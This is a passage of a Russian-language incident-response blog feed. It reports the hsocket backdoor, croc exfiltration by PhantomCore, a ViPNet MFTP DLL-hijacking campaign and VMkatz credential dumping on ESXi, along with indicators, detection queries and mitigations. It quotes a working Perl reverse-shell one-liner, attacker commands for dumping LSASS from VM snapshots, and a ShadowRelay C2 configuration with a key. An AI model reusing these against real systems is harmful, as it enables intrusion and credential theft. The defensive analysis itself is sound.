<p><strong>Сетевые индикаторы компрометации:</strong></p>
<pre><code>135.136.63.63
139.28.49.138
146.70.169.246
193.24.211.91
193.32.126.168
31.177.110.136
37.32.73.156
64.62.156.162
64.62.156.222
64.62.156.94
88.214.21.183
89.116.171.182
89.117.94.35</code></pre>
<p><strong><br />
Gsocket:</strong></p>
<pre><code>*.gs.thc.org
gsocket.io
152.53.173.29
152.53.173.30
176.65.149.52
212.132.98.170
217.154.53.116
217.154.53.187
45.90.4.121
45.90.4.128
51.91.190.241
51.91.190.242</code></pre>
<p><span class="hashtag">#IR</span> <span class="hashtag">#CVE</span> <span class="hashtag">#Malware</span> <span class="hashtag">#detect</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Он вам не gsocket</title>
		<link>/hes-not-your-gsocket/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 08 Sep 2026 14:44:27 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bd-%d0%b2%d0%b0%d0%bc-%d0%bd%d0%b5-gsocket/</guid>

					<description><![CDATA[Он вам не gsocket 😑 В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket). После получения первоначального доступа и установки веб-шелла…]]></description>
										<content:encoded><![CDATA[<p><strong>Он вам не gsocket</strong> 😑</p>
<p>В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент <code>hsocket</code> (не путать с <code>gsocket</code>).</p>
<p>После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.</p>
<p>1️⃣ <code>hsocket</code> — бэкдор, имеющий следующий функционал:</p>
<p>• запуск интерактивной командной оболочки</p>
<p>• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)</p>
<p>• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)</p>
<p>• защита файлов от удаления</p>
<p>• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:</p>
<pre><code>perl -e &quot;use Socket;\$i=\&quot;$hsHOST\&quot;;\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname(&#039;tcp&#039;));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,&#039;&gt;&amp;S&#039;);open(STDOUT,&#039;&gt;&amp;S&#039;);open(STDERR,&#039;&gt;&amp;S&#039;);exec(&#039;sh -i&#039;);};&quot;</code></pre>
<p>• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)</p>
<p>2️⃣ <code>hfsm</code> — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.</p>
<p>3️⃣ <code>.hsrc</code> — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.</p>
<p>В рамках данного исследования нам удалось <a href="https://alexiregar.wordpress.com/" rel="noopener" target="_blank">обнаружить статью</a>, написанную на индонезийском языке, в которой было описано данное ВПО.</p>
<p>Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:</p>
<pre><code>// Fungsi untuk tampilan halaman login
$Warning = &quot;### ⚠️Info!! Terdekteksi Aktivitas Dari&quot;;</code></pre>
<p>Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:</p>
<pre><code>//------------------GECKO SHELL, RECODED BY AYANA--------------------//
&lt;!-- Gecko Folder File Manager --&gt;</code></pre>
<p><strong>IoC:</strong></p>
<pre><code>hsocket.io
/tmp/hs-data/</code></pre>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#ioc</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>We will croc you</title>
		<link>/we-will-croc-you/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Wed, 02 Sep 2026 18:56:38 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">/we-will-croc-you/</guid>

					<description><![CDATA[We will croc you 👻 PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации. Об атаках на 1С с помощью 1cshell мы писали ранее (1, 2, 3). В…]]></description>
										<content:encoded><![CDATA[<p><strong>We will croc you </strong><strong>👻</strong></p>
<p>PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации. </p>
<p>Об атаках на 1С с помощью <code>1cshell</code> мы писали ранее (<a href="https://t.me/ptescalator/276" rel="noopener" target="_blank">1</a>, <a href="https://t.me/ptescalator/383" rel="noopener" target="_blank">2</a>, <a href="https://t.me/ptescalator/385" rel="noopener" target="_blank">3</a>). </p>
<p>В рамках расследования инцидента команда PT ESC IR обнаружила компрометацию сервера 1С, работающего на операционной системе семейства Linux 🐧</p>
<p>Среди характерных признаков — наличие вредоносных исполняемых файлов в подкаталогах домашней директории служебного пользователя <code>usr1cv8</code> и команд в <code>.bash_history</code> того же пользователя — в частности просмотр и удаление файла <code>res.txt</code>, в который записывается результат выполнения кода посредством <code>1cshell</code>.</p>
<pre><code>/home/usr1cv8/.bash_history: cat res.txt

/home/usr1cv8/.bash_history: rm res.txt</code></pre>
<p>После получения доступа в систему PhantomCore установили ReverseSSH-туннель, что является типичным поведением для данной группировки.</p>
<p>🕵️‍♂️ Помимо часто используемого инструментария, мы встретили и более диковинную утилиту <code>croc</code>, предназначенную для удаленной загрузки и эксфильтрации файлов.</p>
<p>На исследуемом узле были обнаружены команды формата: <code>CROC_SECRET=[REDACTED] ./croc</code></p>
<p>С помощью нее злоумышленники могли загрузить на скомпрометированный узел файл, который был предварительно отправлен через веб-интерфейс <code>https://getcroc.com/</code> (на скриншоте) или с другого компьютера, на котором установлен <code>croc</code>.</p>
<p>💡 Для поиска следов использования croc можно поискать исполняемый файл с соответствующим именем, а также использование переменной окружения <code>CROC_SECRET</code>.</p>
<p>В качестве сетевого индикатора может служить домен <code>getcroc.com</code>.</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#tip</span> <span class="hashtag">#apt</span> <span class="hashtag">#detect</span> <span class="hashtag">#dfir</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>ViPNet как транспорт для ВПО 📦</title>
		<link>/vipnet-as-transport-for-malware/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 16 Jul 2026 19:48:19 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/vipnet-as-transport-for-malware/</guid>

					<description><![CDATA[Специалисты PT ESC зафиксировали признаки реализации злоумышленниками атаки через штатную функциональность службы ViPNet MFTP. На момент публикации поста хронология атаки охватывает период как минимум с 1 июня по 14 июля 2026 года,…]]></description>
										<content:encoded><![CDATA[<p>Специалисты PT ESC зафиксировали признаки реализации злоумышленниками атаки через штатную функциональность службы ViPNet MFTP. На момент публикации поста хронология атаки охватывает период как минимум с <strong>1 июня по 14 июля 2026 года</strong>, а ее поверхность — <strong>как минимум 8 организаций</strong>.</p>
<blockquote>
<p>При подозрении на инцидент — <a href="https://ptsecurity.com/services/esc/?utm_source=tg_esc&#038;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;utm_medium=vipnet&#038;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;utm_campaign=16_07#main-form" rel="noopener" target="_blank">пишите нам</a>, поможем с расследованием.</p>
</blockquote>
<h3>Как происходит атака</h3>
<p>Посредством базовой функциональности транспортного протокола MFTP злоумышленники передают между клиентами файл-конверт (<code>.ctl</code>), содержащий вредоносную библиотеку <code>wtsapi32.dll</code>, которая загружается исполняемым файлом <code>Itcsrvup64.exe</code> (компонент службы обновления ПО ViPNet) при помощи техники <strong>DLL Hijacking</strong> и сохраняется на файловую систему посредством техники <strong>Path Traversal</strong> по пути:</p>
<pre><code>C:\ProgramData\InfoTeCS\&lt;9-значный_идентификатор_устройства&gt;\./../../../program files (x86)/infotecs/vipnet update system/wtsapi32.dll</code></pre>
<h3>wtsapi32.dll</h3>
<p>ВПО представляет собой загрузчик, хранящий в секции <code>.data</code> исполняемый файл в виде DLL-библиотеки с измененными магическими байтами (magic bytes) заголовка.</p>
<p>ВПО выполняет проверку контекста запуска. В случае запуска в контексте любого процесса, кроме <code>svchost.exe</code>, оно находит работающий экземпляр процесса <code>svchost.exe</code> с параметром <code>netsvcs</code> в командной строке и внедряет туда указанную библиотеку.</p>
<p><strong>Основной функционал ВПО:</strong></p>
<ul>
<li>работа в режиме прокси-сервера для перенаправления сетевого трафика;</li>
<li>загрузка дополнительных DLL-библиотек в адресное пространство;</li>
<li>выполнение загруженных библиотек.</li>
</ul>
<p>В основе обработки команд лежит диспетчер IOCTL-запросов, управляющий таблицей активных подключений через перехват WinAPI-функций:</p>
<ul>
<li><code>NtDeviceIoControlFile</code></li>
<li><code>closesocket</code></li>
<li><code>shutdown</code></li>
</ul>
<p>С помощью библиотеки <strong>Detours</strong> таблица:</p>
<ul>
<li>блокирует преждевременное закрытие сетевых сокетов;</li>
<li>обрабатывает код операции <code>AFD_GET_TDI_HANDLES (0x12037)</code> для регистрации нового сокета;</li>
<li>обрабатывает <code>AFD_RECV (0x12017)</code> для начала обработки входящего трафика.</li>
</ul>
<p>Дескрипторы сохраняются в таблицу (по <strong>8344 байта</strong> на запись).</p>
<p>При обработке кода <code>0x12017</code> ВПО записывает идентификаторы потока и процесса в файл:</p>
<pre><code>C:\Users\Public\tesh4RPC.txt</code></pre>
<p>в формате:</p>
<pre><code>threadid: pid=</code></pre>
<p>Параллельно ВПО разворачивает TCP-сервер на портах:</p>
<ul>
<li><code>5003</code></li>
<li><code>5060</code></li>
</ul>
<p>Для каждого клиента создается отдельный поток обработки.</p>
<p>После успешного «рукопожатия»:</p>
<ul>
<li>отправляются два байта <code>0x0502</code>;</li>
<li>ожидается строка:</li>
</ul>
<pre><code>ASDFASFSAFASDF</code></pre>
<p>Далее:</p>
<ul>
<li>сообщения вида <code>:&lt;данные&gt;</code> используются для создания новых сокетов и проксирования трафика;</li>
<li>если поступает исполняемый файл — он загружается в память процесса и запускается в отдельном потоке.</li>
</ul>
<h3>SetupChk.exe</h3>
<p>Отдельно стоит отметить эпизод в конце мая 2026 года — на клиентские устройства ViPNet был доставлен пакет обновления в виде <code>.lzh</code>-архива, содержащего:</p>
<ul>
<li><code>SetupCheck.dll</code></li>
<li><code>SetupChk.exe</code></li>
</ul>
<p>ВПО считывает информацию из реестра Windows:</p>
<pre><code>SOFTWARE\Wow6432Node\InfoTeCS\ITCSShared\AuthInfo</code></pre>
<p>После чего определяет версию клиента по ключу (ожидает версию 4.5):</p>
<pre><code>SOFTWARE\Infotecs\FeaturesAndComponents\Monitor_Feature</code></pre>
<p><strong>Функциональность ВПО:</strong></p>
<p>1️⃣ Очистка журналов InfoTeCS:</p>
<ul>
<li><code>C:\ProgramData\InfoTeCS\UpdateSystemData\UpdateSystem.Journal</code></li>
<li><code>C:\ProgramData\InfoTeCS\UpdateSystemData\updateservice.log.txt</code></li>
<li><code>C:\ProgramData\InfoTeCS\Mftp\mftp.debug.log</code></li>
<li><code>C:\Program Files (x86)\InfoTeCS\ViPNet Client\mftp.log</code></li>
</ul>
<p>2️⃣ Cбор информации о системе:</p>
<ul>
<li>процессы;</li>
<li>сетевые соединения;</li>
<li>установленное ПО;</li>
</ul>
<p>3️⃣ Формирование вредоносного конверта <code>m02smnrf.ctl</code>.</p>
<p>Во время расследования также были обнаружены:</p>
<ul>
<li><a href="https://rt-solar.ru/solar-4rays/blog/5544/" rel="noopener" target="_blank">загрузчик</a> <strong>Donnect</strong> (<code>mocdng.dll</code>);</li>
<li><a href="https://rt-solar.ru/solar-4rays/blog/6328/" rel="noopener" target="_blank">бэкдор</a> <strong>ShadowRelay</strong> (<code>Diagnosis.exe</code>).</li>
</ul>
<p>Конфигурация обнаруженного экземпляра ShadowRelay:</p>
<pre><code>{
  &quot;mode&quot;: &quot;client&quot;,
  &quot;proto&quot;: &quot;tcp&quot;,
  &quot;svri&quot;: &quot;154.89.152.59&quot;,
  &quot;svrp&quot;: 443,
  &quot;reconnintv&quot;: 459,
  &quot;enctype&quot;: &quot;aes&quot;,
  &quot;aeskey&quot;: &quot;]zf,.Hso&#039;!x3|ezz/hzHzxa(P=x.bB.r&quot;,
  &quot;rsapubkey&quot;: &quot;not set&quot;,
  &quot;rsaprikey&quot;: &quot;not set&quot;,
  &quot;antidebug&quot;: 1,
  &quot;autodelete&quot;: 0,
  &quot;autostart&quot;: 0,
  &quot;portreuse&quot;: 0,
  &quot;envpara&quot;: &quot;3ff18683a02d3aefab2f&quot;,
  &quot;targetprocess&quot;: &quot;&quot;,
  &quot;usehttp&quot;: 0,
  &quot;servicename&quot;: &quot;svcsvc&quot;,
  &quot;servicedesc&quot;: &quot;OneDrive client application&quot;,
  &quot;beattimeout&quot;: 65
}</code></pre>
<h2>Метод обнаружения</h2>
<p>Для проверки факта реализации инцидента рекомендуется выполнить:</p>
<pre><code>Get-ChildItem -Path &quot;C:\ProgramData\Infotecs\Mftp&quot; -File -Recurse |
Select-String -Pattern &quot;\.dll|\.\/\.\.\/\.\.\/\.\.\/&quot;</code></pre>
<p>Пример обнаружения:</p>
<pre><code>C:\ProgramData\Infotecs\Mftp\mftp.debug.log:166742:REDACTED [REDACTED]: File C:\ProgramData\InfoTeCS\REDACTED\./../../../program files (x86)/infotecs/vipnet update system/wtsapi32.dll with keepFlag=0 and fileSize=219136</code></pre>
<p>Для проверки получения вредоносного обновления:</p>
<pre><code>Get-ChildItem -Path &quot;C:\ProgramData\Infotecs\UpdateSystemData&quot; -File -Recurse |
Select-String -Pattern &quot;/driv_fs/&quot;</code></pre>
<p>Пример результата:</p>
<pre><code>C:\ProgramData\Infotecs\UpdateSystemData\updateservice.log.lo1:9157:REDACTED: Extracting file update/driv_fs/setup.exe.config

C:\ProgramData\Infotecs\UpdateSystemData\updateservice.log.lo1:9158:REDACTED: Extracting file update/driv_fs/setupcheck.dll

C:\ProgramData\Infotecs\UpdateSystemData\updateservice.log.lo1:9159:REDACTED: Extracting file update/driv_fs/setupchk.exe</code></pre>
<p>💡 MaxPatrol SIEM и MaxPatrol EDR обнаруживают эксплуатацию уязвимости в ViPNet правилом DLL_Side_Loading. MaxPatrol VM детектит недостаток и дает рекомендации по его оперативному закрытию.</p>
<h2>Рекомендации</h2>
<p>Накатить обновелния: ViPNet Client 4 версии 4.5.3 сборки 65211 и выше, версию 4.5.5 сборки 24733, которая станет доступна в ближайшее время, а также ViPNet Administrator версии 4.6.11.5113 и выше.</p>
<p>А если возможности нет, то для нейтрализации угроз необходимо:</p>
<ul>
<li>остановить службу <strong>ViPNet система обновления</strong>;</li>
<li>отключить службу на каждом узле, где она установлена;</li>
<li>запретить автоматический запуск.</li>
</ul>
<h4>Вариант А. Через графический интерфейс</h4>
<ol>
<li><code>Win + R</code></li>
<li><code>services.msc</code></li>
<li>Найти службу <strong>ViPNet система обновления</strong>.</li>
<li>Открыть свойства.</li>
<li>Выбрать тип запуска <strong>Отключена (Disabled)</strong>.</li>
<li>Нажать <strong>Стоп</strong>.</li>
<li>Нажать <strong>Применить</strong> и <strong>ОК</strong>.</li>
</ol>
<h4>Вариант Б. Через PowerShell</h4>
<pre><code># Остановка службы
Stop-Service -Name &quot;itcsrvup&quot; -Force

# Отключение службы
Set-Service -Name &quot;itcsrvup&quot; -StartupType Disabled</code></pre>
<p>Дополнительно необходимо отключить службу <strong>MFTP</strong> на координаторах HW и xFirewall службу MFTP при помощи команды:</p>
<pre><code>mftp stop</code></pre>
<p>Также важно:</p>
<ul>
<li>отслеживать появление индикаторов компрометации;</li>
<li>своевременно обновлять компоненты ПО ViPNet.</li>
</ul>
<h2>IoC&#039;s</h2>
<h3>Образцы ВПО</h3>
<table>
<tr>
<th style="text-align:center">Имя файла</th>
<th style="text-align:center">SHA-256 / Hash</th>
</tr>
<tr>
<td>SetupCheck.dll</td>
<td><code>8b089163edb36e7a65baccb8ab317895162057a1acb2a5dc59dffd3d03c7cdb5</code></td>
</tr>
<tr>
<td>SetupChk.exe</td>
<td><code>7d0e3efe656a28251e6460af1baa489ea6a07053a4bc6578edba659ab28afd5d</code></td>
</tr>
<tr>
<td>Rngpkcsmgr.exe</td>
<td>—</td>
</tr>
<tr>
<td>Rngsdkcfg.exe</td>
<td><code>68b4c76a2280e3c31130d4de12b12dfd479a476f347f5b4a58cb2483d74aba7e</code></td>
</tr>
<tr>
<td>wtsapi32.dll</td>
<td><code>841aea34ca81577468c3a5ab3039370a83cd9dca7ad95af092a9a22b661ec3f1</code></td>
</tr>
<tr>
<td>wtsapi32.dll</td>
<td><code>b8192bb83d5d33bf6e32879d2bfb783cbbd3df6ded23206867161f091897d4c4</code></td>
</tr>
<tr>
<td>wtsapi32.dll</td>
<td><code>ffdc194775b2904564bbbd1cf0eb01d1a01f83ef5197d1612b6e2d69de7a4732</code></td>
</tr>
<tr>
<td>—</td>
<td><code>5e462c89def65cbdddbd3ae78a1e281400199143af330e976384416cf466b9d8</code></td>
</tr>
<tr>
<td>m02smnrf.ctl</td>
<td>—</td>
</tr>
<tr>
<td>mocdng.dll</td>
<td><code>e19adeaaa9f19f2cf0460d9f61ff54e90b5de30c2cd8d1db04fdf8afaa243295</code></td>
</tr>
<tr>
<td>update.bat</td>
<td><code>bc34b8d8bc320c5fa1d280e6a7ca876950047d2ee0520b0f5e49bb49481e987d</code></td>
</tr>
<tr>
<td>info.bat</td>
<td><code>4921e2f1fb2ef81862e6727bbac653c8e66fd2132529205798788981905151fc</code></td>
</tr>
<tr>
<td>odcitvmd.dll</td>
<td><code>82dd0af848118009709639d75ca43bd9</code></td>
</tr>
<tr>
<td>msvdplib.dll</td>
<td><code>5384157b66e9976c9a1c8429d236b512</code></td>
</tr>
<tr>
<td>mustd.exe</td>
<td><code>13d8d4f4fa483111e4372a6925d24e28f3be082a2ea8f44304384982bd692ec9</code></td>
</tr>
<tr>
<td>Diagnosis.exe</td>
<td><code>c2f2a6a28d41ac243455a30c4ab39af13ed647e43d00eb69c14482e9314e9140</code></td>
</tr>
</table>
<h3>Файловые индикаторы</h3>
<ul>
<li><code>C:\Users\Public\tesh4RPC.txt</code></li>
<li><code>C:\Users\Public\ntusers.logs</code></li>
<li><code>C:\ProgramData\InfoTeCS\&lt;9-значный_идентификатор_устройства&gt;\ccc\wtsapi32.up1</code></li>
<li><code>C:\Users\Public\music\info.bat</code></li>
<li><code>C:\Users\Public\music\up.zip</code></li>
<li><code>C:\Users\Public\music\res.log</code></li>
<li><code>C:\Users\Public\music\mustd.exe</code></li>
</ul>
<h3>Сервисы</h3>
<ul>
<li>Network Monitor Serial Service</li>
<li>OneDrive client application</li>
<li>Ntmssvc</li>
<li>Svcsvc</li>
</ul>
<h3>Сетевые индикаторы</h3>
<table>
<tr>
<th style="text-align:center">IP</th>
<th style="text-align:center">Страна</th>
<th style="text-align:center">Организация</th>
</tr>
<tr>
<td><code>123.58.203.41</code></td>
<td>India</td>
<td>AS135377 UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED</td>
</tr>
<tr>
<td><code>154.89.152.59</code></td>
<td>Malaysia</td>
<td>AS139923 ABCCLOUD SDN.BHD.</td>
</tr>
<tr>
<td><code>31.57.35.21</code></td>
<td>United Kingdom</td>
<td>AS21859 Zenlayer Inc</td>
</tr>
<tr>
<td><code>5.39.253.206</code></td>
<td>Kazakhstan</td>
<td>AS49791 Newserverlife LLC</td>
</tr>
</table>
<p>Следим за развитием событий и будем дополнять материал на сайте по мере появления <a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/attack-via-the-vipnet-mftp-service-signs-of-compromise-and-recommendations/" rel="noopener" target="_blank">новых подробностей</a>.</p>
<p><span class="hashtag">#dfir</span> <span class="hashtag">#ir</span> <span class="hashtag">#ti</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>VMkatz: скрытая угроза для виртуальной инфраструктуры 🫣</title>
		<link>/vmkatz-a-hidden-threat-to-virtual-infrastructure/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Wed, 01 Jul 2026 14:58:43 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[esxi]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">/vmkatz-a-hidden-threat-to-virtual-infrastructure/</guid>

					<description><![CDATA[В 2026 году был опубликован инструмент VMkatz. По функционалу он напоминает широко известный инструмент Mimikatz, но, в отличие от него, целью VMkatz является извлечение учетных данных напрямую из файлов виртуальных машин (снимков…]]></description>
										<content:encoded><![CDATA[<p>В 2026 году был опубликован инструмент <a href="https://github.com/nikaiw/VMkatz" rel="noopener" target="_blank">VMkatz</a>. По функционалу он напоминает широко известный инструмент Mimikatz, но, в отличие от него, целью VMkatz является извлечение учетных данных напрямую из файлов виртуальных машин (снимков памяти и виртуальных дисков) без необходимости входа внутрь гостевых Windows-систем. VMkatz может работать с файлами виртуальных машин разных платформ, включая VMware ESXi, Microsoft Hyper-V, VirtualBox и QEMU/KVM.</p>
<p>Для ESXi-систем разработчиком был подготовлен отдельный <a href="https://github.com/nikaiw/VMkatz/blob/main/tools/vmkatz_loader.py" rel="noopener" target="_blank">Python-загрузчик</a>, предназначенный для размещения VMkatz в памяти без запуска бинарного файла через <code>execve()</code>. Вместо этого скрипт открывает ELF-бинарь как набор байтов, разбирает его заголовки и загружаемые сегменты, выделяет области памяти в адресном пространстве текущего процесса, копирует туда содержимое ELF и затем передает управление на его точку входа.</p>
<p>В результате VMkatz не запускается как отдельный процесс, а выполняется внутри уже существующего процесса Python. Такой механизм используется для обхода ограничений параметра <code>execInstalledOnly</code>, который запрещает запуск неподписанных бинарных файлов. На <em>скриншоте 1</em> представлен пример работы VMkatz на ESXi, запущенного с помощью Python-загрузчика. В качестве входных данных инструменту был передан снимок оперативной памяти виртуальной машины. В результате VMkatz извлек доступные учетные данные.</p>
<figure class="wp-block-image"><img width="1024" height="789" src="/wp-content/uploads/2026/07/photo_585@01-07-2026_14-58-43-1024x789.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/07/photo_585@01-07-2026_14-58-43-1024x789.jpg 1024w, /wp-content/uploads/2026/07/photo_585@01-07-2026_14-58-43-300x231.jpg 300w, /wp-content/uploads/2026/07/photo_585@01-07-2026_14-58-43-768x592.jpg 768w, /wp-content/uploads/2026/07/photo_585@01-07-2026_14-58-43.jpg 1400w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p>В одном из расследований команда PT ESC IR столкнулась со сценарием, в котором злоумышленники, получив доступ к гипервизору VMware ESXi, использовали подобный подход для извлечения учетных данных из виртуальных машин с помощью следующих команд:</p>
<pre><code class="language-python">python /tmp/vmkatz_loader.py /tmp/vmkatz --dump lsass /vmfs/volumes/DATA/VM-DC01/VM-DC01-Snapshot.vmsn
python /tmp/vmkatz_loader.py /tmp/vmkatz /vmfs/volumes/DATA/VM-DC01/VM-DC01-Snapshot.vmsn
python /tmp/vmkatz_loader.py /tmp/vmkatz /vmfs/volumes/DATA/VM-DC01/VM-DC01.vmdk</code></pre>
<p>Отдельный риск представляет функция утилиты для извлечения базы данных Active Directory <code>NTDS.dit</code> и раздела реестра <code>SYSTEM</code> с контроллеров доменов (<em>пример показан на скриншоте 2</em>). В таком случае компрометация гипервизора может привести не только к компрометации отдельных виртуальных машин, но и к компрометации всего домена.</p>
<figure class="wp-block-image"><img width="1024" height="667" src="/wp-content/uploads/2026/07/photo_586@01-07-2026_14-58-43-1024x667.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/07/photo_586@01-07-2026_14-58-43-1024x667.jpg 1024w, /wp-content/uploads/2026/07/photo_586@01-07-2026_14-58-43-300x195.jpg 300w, /wp-content/uploads/2026/07/photo_586@01-07-2026_14-58-43-768x500.jpg 768w, /wp-content/uploads/2026/07/photo_586@01-07-2026_14-58-43.jpg 1400w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<h2>Как защититься?</h2>
<ul>
<li>Включать шифрование всех файлов виртуальных машин.</li>
<li>Отключать SSH-доступ и не использовать его как основной способ администрирования. SSH должен включаться только временно, когда это необходимо для диагностики или устранения неисправностей. В качестве метода аутентификации следует использовать SSH-ключи вместо паролей. Также необходимо организовать мониторинг событий входа на гипервизор под привилегированными учетными записями.</li>
<li>Доступ к TCP-порту 22 необходимо ограничить с помощью межсетевых экранов или выделенного административного сегмента. Подключения должны разрешаться только с jump-узлов или доверенных административных IP-адресов, доступ к которым защищен многофакторной аутентификацией.</li>
</ul>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#esxi</span> <span class="hashtag">#tip</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Заглядываем внутрь ESE</title>
		<link>/a-look-inside-ese/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Fri, 19 Jun 2026 14:20:09 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d0%b7%d0%b0%d0%b3%d0%bb%d1%8f%d0%b4%d1%8b%d0%b2%d0%b0%d0%b5%d0%bc-%d0%b2%d0%bd%d1%83%d1%82%d1%80%d1%8c-ese/</guid>

					<description><![CDATA[Заглядываем внутрь ESE 🫣 В ходе расследования инцидентов мы в PT ESC IR регулярно сталкиваемся с необходимостью анализа баз данных в формате ESE (Extensible Storage Engine), поскольку в подобных артефактах можно найти…]]></description>
										<content:encoded><![CDATA[<p><strong>Заглядываем внутрь ESE</strong> 🫣</p>
<p>В ходе расследования инцидентов мы в PT ESC IR регулярно сталкиваемся с необходимостью анализа баз данных в формате ESE (Extensible Storage Engine), поскольку в подобных артефактах можно найти много интересного.</p>
<p>Чтобы эффективнее работать с такими файлами, важно понимать, как этот формат устроен изнутри. Поэтому по итогам исследования мы подготовили подробный разбор внутреннего устройства ESE (также известного как Jet Blue) — встроенной СУБД от Microsoft, которая используется во многих продуктах компании. </p>
<p>В статье рассказываем, как на низком уровне организовано хранение данных, как устроены страницы и записи, а также разбираем особенности реализации движка, которые могут быть полезны при анализе содержимого БД и разработке собственных парсеров для работы с такими файлами.</p>
<p>🫱 Подробности — <a href="https://habr.com/ru/companies/pt/articles/1048794/" rel="noopener" target="_blank">на Хабре</a>.</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#win</span> <span class="hashtag">#tip</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Редкие техники закрепления. Часть 4</title>
		<link>/rare-persistence-techniques-part-4/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 09 Jun 2026 16:48:42 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">/%d1%80%d0%b5%d0%b4%d0%ba%d0%b8%d0%b5-%d1%82%d0%b5%d1%85%d0%bd%d0%b8%d0%ba%d0%b8-%d0%b7%d0%b0%d0%ba%d1%80%d0%b5%d0%bf%d0%bb%d0%b5%d0%bd%d0%b8%d1%8f-4/</guid>

					<description><![CDATA[Редкие техники закрепления. Часть 4 Читайте также про: Zabbix Agent, TimeProvider, COM Hijacking, WMICLNT. 5️⃣ Systemd Generator Systemd Generator — это исполняемый файл, который systemd запускает на этапе загрузки системы (или при…]]></description>
										<content:encoded><![CDATA[<p><strong>Редкие техники закрепления</strong>. Часть 4</p>
<p><em>Читайте также про: </em><a href="https://t.me/ptescalator/734" rel="noopener" target="_blank">Zabbix Agent</a><em>, </em><a href="https://t.me/ptescalator/734" rel="noopener" target="_blank">TimeProvider</a><em>, </em><a href="https://t.me/ptescalator/735" rel="noopener" target="_blank">COM Hijacking</a><em>, </em><a href="https://t.me/ptescalator/737" rel="noopener" target="_blank">WMICLNT</a><em>. </em></p>
<p>5️⃣<strong> Systemd Generator</strong></p>
